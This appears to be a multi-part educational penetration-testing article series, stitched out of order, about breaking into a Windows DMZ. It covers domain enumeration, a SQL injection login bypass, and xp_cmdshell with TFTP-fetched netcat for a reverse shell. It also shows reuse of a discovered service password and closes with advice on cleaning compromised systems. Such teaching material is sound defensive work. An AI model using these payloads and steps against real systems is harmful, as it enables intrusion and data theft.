For now, let's take a closer look at the other system on the network.

C:\warez>dumpinfo 172.17.0.2

The Administrator is:   PYN-DMZ\Administrator

Users on PYN-DMZ-DC:
RID 1000   PYN-DMZ\HelpServicesGroup  an Alias
RID 1001   PYN-DMZ\SUPPORT_388945a0   a User
RID 1002   PYN-DMZ\TelnetClients      an Alias
RID 1003   PYN-DMZ\PYN-DMZ-DC$        a User
RID 1104   PYN-DMZ\DnsAdmins          an Alias
RID 1105   PYN-DMZ\DnsUpdateProxy     a Group
RID 1106   PYN-DMZ\FAjenstat          a User
RID 1107   PYN-DMZ\AAlberts           a User
RID 1108   PYN-DMZ\HAcevedo           a User
RID 1109   PYN-DMZ\MAlexander         a User
RID 1110   PYN-DMZ\KAkers             a User
RID 1111   PYN-DMZ\TAdams             a User
RID 1112   PYN-DMZ\KAbercrombie       a User
RID 1113   PYN-DMZ\Sculp              a User
RID 1114   PYN-DMZ\SAbbas             a User
RID 1115   PYN-DMZ\MAllen             a User
RID 1116   PYN-DMZ\JAdams             a User
RID 1117   PYN-DMZ\SAlexander         a User
RID 1118   PYN-DMZ\HAbolrous          a User
RID 1119   PYN-DMZ\PAckerman          a User
RID 1120   PYN-DMZ\GAlderson          a User
RID 1121   PYN-DMZ\PYN-SQL$           a User
RID 1122   PYN-DMZ\PYN-WEB$           a User
RID 1123   PYN-DMZ\_IDS               a User

Share      Type            Comment
IPC$       Unknown         Remote IPC
NETLOGON   Disk            Logon server share
ADMIN$     Special         Remote Admin
SYSVOL     Disk            Logon server share
C$         Special         Default share

Administrators:
Unable to enumerate administrators
ERROR: Access Denied

 

The machine must be a domain controller because the account domains are PYN-DMZ but the hostname is PYN-DMZ-DC. By default, Windows Server 2003 DCs are configured for down-level compatibility. They let anonymous users access all information except for the list of users who are administrators. For completeness, we can also do a port scan:

C:\warez>portscan 172.17.0.2
Port 172.17.0.2:53 open
Port 172.17.0.2:135 open
Port 172.17.0.2:139 open
Port 172.17.0.2:389 open
Port 172.17.0.2:445 open
Port 172.17.0.2:3268 open

Since port 3268 is listening, this must be a Global Catalog server for the forest. This means that 172.17.0.2 is a highly valuable target. Interestingly, this system does not have Terminal Services enabled.

I still do not know where the _ids account is used, so I'll just have to try it. There is no point in trying it on the DC since I know there is no account there with that name, so I try it on the Web server. Before I can do that, I need the hostname on the Web server. For this I use a custom tool, GetSystemInfo:

C:\warez>GetSystemInfo 172.17.0.1
Server info on 172.17.0.1
Name:        PYN-WEB
Domain:      PYN-DMZ
Version:     5.2
Platform ID: 500
Comment:
Server Flags:
Workstation
Server
Dial-in Server

GetSystemInfo is a very simple tool that merely connects to the system and asks for information in the HKLM\Software\Microsoft\Windows NT\CurrentVersion key. From this you see that the system is called PYN-WEB. I still don't know exactly how to hack this box, but I'll try one more thing:

C:\warez>serviceuser \\PYN-WEB
IDS                             PYN-DMZ\_ids

I almost have the info I need because the Web server is also running the IDS service under the same account. That's all I need to try the _ids account:

C:\warez>net use \\172.17.0.1\c$ /u:pyn-dmz\_ids idsPasswd!
The command completed successfully.

As you can see, I have successfully taken over the Web server! Now my objective changes to taking over the domain itself and in turn getting to the corporate domain from there.

More in next article.

This article is not intended to show you how to hack something, but rather to show how attackers can take advantage of your mistakes. This will enable you to avoid the common pitfalls that criminal hackers exploit.

Most networks today are built on what is called the eggshell principle: hard on the outside and soft on the inside. This means that if an attacker can gain a foothold onto the network, the rest of the network will usually fall like dominoes. Once inside, the most difficult part is often to figure out what to attack next and where to go for the really juicy bits of information. It does not have to be this way. With the proper techniques, we as network administrators can achieve two crucial objectives: to make it much more difficult to gain a foothold in the first place and to make it much more difficult to use that foothold to get anywhere else on the network.

Network Address Ranges and Host Names

Say I'm performing a penetration test of solidstore.co.uk. I would start out by looking up what networks are registered to solidstore.co.uk. Perhaps even more interesting than the publicly registered address ranges for solidstore.co.uk is any information on networks connected to the target network, such as an extranet or a business partner. It's often easier to attack poorsecurity.co.uk and take over that domain before jumping from there to solidstore.co.uk. Like links in a chain, a network is only as secure as the least secure network connected to it (including all the VPN users connecting into it).

The next thing the attacker needs is host names. In some cases, it is possible to perform nslookup requests on large swaths of the network and it may even be possible to perform something called a zone transfer. A zone transfer is simply a request to a DNS server to send back a copy of an entire DMZ zone (a listing of all the registered names in the network). While host names are not critically important to most attacks, they can make an attack much simpler. For example, if you have the hostname of a Web server running IIS, you can deduce the anonymous IIS account for that host, since it is usually called IUSR_hostname. Now let's assume that the administrator has configured account lockout on that system. All an attacker has to do to take down that Web server is to send a large number of requests to the server asking it to authenticate you as IUSR_hostname. In short order the attacker can send enough bad passwords to lock out the anonymous user account. Once that account is locked out, the attacker can just keep sending enough bad requests to keep it that way and this Web server will no longer serve anything to anyone.

Exposed Hosts and Exposed Applications

More interesting than host names are the hosts that are actually exposed. In this phase of the attack, I am trying to locate easy targets. Doing so may be absolutely trivial. You may not even need any hacking tools, as long as Internet Control Message Protocol (ICMP) traffic is not blocked at the border.

In the vast majority of cases, ICMP traffic should be sent to /dev/null at the border. Even a half decent firewall should block ICMP, but it is surprising how often administrators forget to ensure that it is actually disabled. No response should even be sent. While this does not really stop enumeration, it makes it marginally more difficult since the attacker needs to rely on custom tools, such as port scanners.

A port scanner is simply a tool that attempts to connect to a target and report whether it was successful or not. A successful connection means the host is listening. An unsuccessful connection usually means it is not. The most common type of port scan is known as a SYN scan, where the attacker attempts to establish an ordinary connection to the target. If a host is listening, the connection will be successful and the port scanner will notify the attacker that a port is open. You can port scan an entire network in short order. Doing so on a range of well-chosen ports can give you a tremendous amount of information about what is available on the network.

Port scanning is the way to determine what applications are exposed on a host. This allows us to get information on possible vectors for attack. Some of the applications commonly looked for include the FTP clients and servers, Telnet, mail servers, and HTTP Web servers.

Version Info and Patch State

If you can, it is very useful to get information on the version of the applications that we find running on a target machine. For example, many applications have some kind of banner that is sent as soon as someone connects. Most SMTP and POP servers as well as many Web servers are configured to do this.

It is also very interesting to an attacker to find out what patch state the exposed servers are in. This information can be found in a variety of ways. In some cases, the banners presented by the applications will tell you all you need to know. For example, sendmail banners usually tell you the version number of the daemon. If you know which version of sendmail still exposes certain vulnerabilities, you have all the information you need. In other cases, you can figure out whether it has a particular patch or not from the responses the system is giving you. This is essentially the technique used in good vulnerability scanners and in OS fingerprinting tools. As a last resort, you can always fire off an exploit against a system and see what happens. This is often how vulnerability scanners look for denial of service attacks. If the system still responds after the attack it was most likely not vulnerable!

Structure of the Apps and Back-End Servers

It is often very helpful to get information about the structure of the application and back-end server(s), if any. This is usually very difficult, but in some cases you luck out. For example, let's assume you have a target network that uses a particular third-party Web application with very distinct file names and page designs. In this case, it is often obvious to the attacker which application you are using. If the attacker is familiar with the application, she may know how to exploit it. For instance, the application may use a configuration file called %webroot%\system.config. If files with the .config extension are not parsed by the Web server, the attacker can simply request this file in a Web browser. In a best-case scenario, that file will only give her information such as the names of the back-end servers and databases. In the worst-case scenario, that file will contain the user name and password used to actually establish the connection between the Web server and a database server.

Do not dismiss this as a contrived example. I encountered this exact situation just a few months ago. A very large number of commercial Web applications are extremely poorly written, essentially turning them into backdoors into the network.

At this point, I have just about all the information I need to start hacking. The first step is to establish an initial foothold into the network, to pierce the eggshell, if you will.

Initial Compromise

Let's assume I've done some initial probing and know that the target network is fully patched and that there is a really tight firewall in front, only allowing traffic on ports 80 and 443 (the defaults for HTTP and HTTPS); where do I go from here? Remember what I said about backdoors. Where could the backdoor be? What am I up against? The first step is to look at what is exposed to me: a Web application.

From this screen, I can tell that this is obviously an ordering site of some kind. Let's use a legitimate account to find out more about it.

The next page shows the Pubs bookstore and lists books for sale. They display my username on the page. This could come in handy if they are not careful, because I can use it to validate certain other techniques. For example, I have a hunch that this site uses a pretty poor algorithm for checking whether users have entered the right username or password (pretty shrewd, considering I wrote the algorithm!). I am also curious whether they are properly validating the input from the username fields. To find out for sure, I'm going to use a technique called SQL injection. Using a SQL injection attack, I pass the following string in the username field.

foo' OR 1=1;--

You can see that not only do I get logged on, but the application also displayed the fake username I sent it on the homepage. This latter artifact is actually a separate type of vulnerability known as a cross-site scripting (CSS) vulnerability, where the user input is echoed directly to the screen without sanitizing it first.

So how was I logged on? There obviously isn't a user called foo' OR 1=1;--. The application is very poorly written. It assumes that if any results come back from the database when it asks for a user with a particular password, then the username and password combination is obviously valid, and therefore it should log on this user. The SQL injection attack effectively rewrote the database query to include the statement OR 1=1. Since 1 is always equal to 1, this evaluates to true, which means the entire query evaluates to true for all records in the database. This will return every user account in the database, which means the application thought I was logged on.

I can now send arbitrary commands to the back-end database server. I am going to use that capability in an elevation of privilege attack to get the database server to run commands for me.

Elevating Privileges

As you saw earlier, the database server is not directly accessible from the Internet, and the front-end Web server is fully patched and not vulnerable to any known attacks. The objective at this point is to elevate my privileges so that I become an internal user, preferably a highly privileged one, on one of the systems in the target network. To do that, I'll use SQL injection to send commands to the database server and ask it to do things for us. Note that I cannot connect directly to the database server, so instead I will ask it to make a connection to me. I'll begin by setting up a listener on the external network, and then I will make the database server connect to me.

Before I can command the database server, I need to get some tools onto the Web server to further the attack. This is important because, generally speaking, hacking tools are not installed on the operating system by default. To get them up there you can use Trivial File Transfer Protocol (TFTP), a connectionless protocol used primarily for booting diskless workstations. The client application for TFTP is installed on all Windows systems by default (with the exception of Windows Server 2003 Service Pack 1 and later), so unless you have removed it, it is still there and available. Since I have a SQL injection vulnerability, I can use it to command the database server to use TFTP to download netcat to the database server. Netcat is a network tool somewhat like telnet, except that it is unauthenticated and much more versatile. It is freely available on the Internet and even comes standard on many UNIX and Linux distributions. It is pretty much universally used by attackers, however, and should never be left on a system where it is not absolutely needed.

The attack works by calling the xp_cmdshell stored procedure. Installed by default on SQL Server, xp_cmdshell is used to execute commands on the underlying operating system.

I will simply use this procedure to run TFTP and upload my tools to the database. xp_cmdshell is rarely needed in most deployments and can be disabled in several ways to protect against exactly this kind of attack. Once I've uploaded netcat, I tell netcat to create a socket, and then I pass that socket as stdin, stdout, and stderr in a call to cmd.exe. This sounds complicated, but it works reliably. The result is an outbound connection where I pipe a command shell over a socket. I now have my remote command line:

c:\>nc -l -p 12345
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>hostname
hostname
PYN-SQL

At this point, I have established my first foothold and am well on the way to taking over the network. I have escalated privileges from a remote anonymous user to an inside user. To find out what kind of user, I need to first get the rest of my tools onto the system. Those tools will be used to escalate local privileges if needed as well as to hack the rest of the systems on the network. I can transfer those, too, using tftp.exe. Once I've done that, I can verify my credentials on the host:

C:\warez>whoami
whoami
NT AUTHORITY\SYSTEM

Bingo! I'm already LocalSystem. That must certainly mean that SQL Server ran xp_cmdshell as LocalSystem, and that I have completely compromised the back-end database server. I can now proceed to hacking other machines on the network.

More in next article.

Once a network has been thoroughly hacked, the system administrator has three options: update their resume, hope the hacker does a good job running the network, or drain the network. You will of course need to take action to deal with the attack. Let's first take a look at some of the available options and assumptions and consider why they might not be the best course of action when cleaning a hacked system.

You cannot clean a compromised system by patching it; patching only removes the vulnerability.  Once an attacker gets into your system, you should assume that he or she has ensured there are several other ways to get back in.

You cannot clean a compromised system by removing the backdoors.  You can never guarantee that you found all the backdoors the attacker put in. The fact that you cannot find any more may only mean you do not know where to look, or that the system is so compromised that what you are seeing is not actually what is there.

You cannot clean a compromised system by using some "vulnerability remover."  Let's say your system was hit by Blaster. A number of vendors (including Microsoft) published vulnerability removers for Blaster. Can you trust a system that had Blaster after the tool is run? I wouldn't. If the system was vulnerable to Blaster, it was also vulnerable to a number of other attacks. Can you guarantee that none of those have been run against it? I didn't think so.

You cannot clean a compromised system by using a virus scanner.  A fully compromised system cannot be trusted to tell you the truth. Even virus scanners must at some level rely on the system to not lie to them. If they ask whether a particular file is present, the attacker may simply have a tool in place that lies about it. If you can guarantee that the only thing that compromised the system was a particular virus or worm and you know that this virus has no backdoors associated with it, and the vulnerability used by the virus was not available remotely, then a virus scanner can be used to clean the system. For example, the vast majority of e-mail worms rely on a user opening an attachment. In this particular case, it is possible that the only infection on the system is the one that came from the attachment containing the worm. However, if th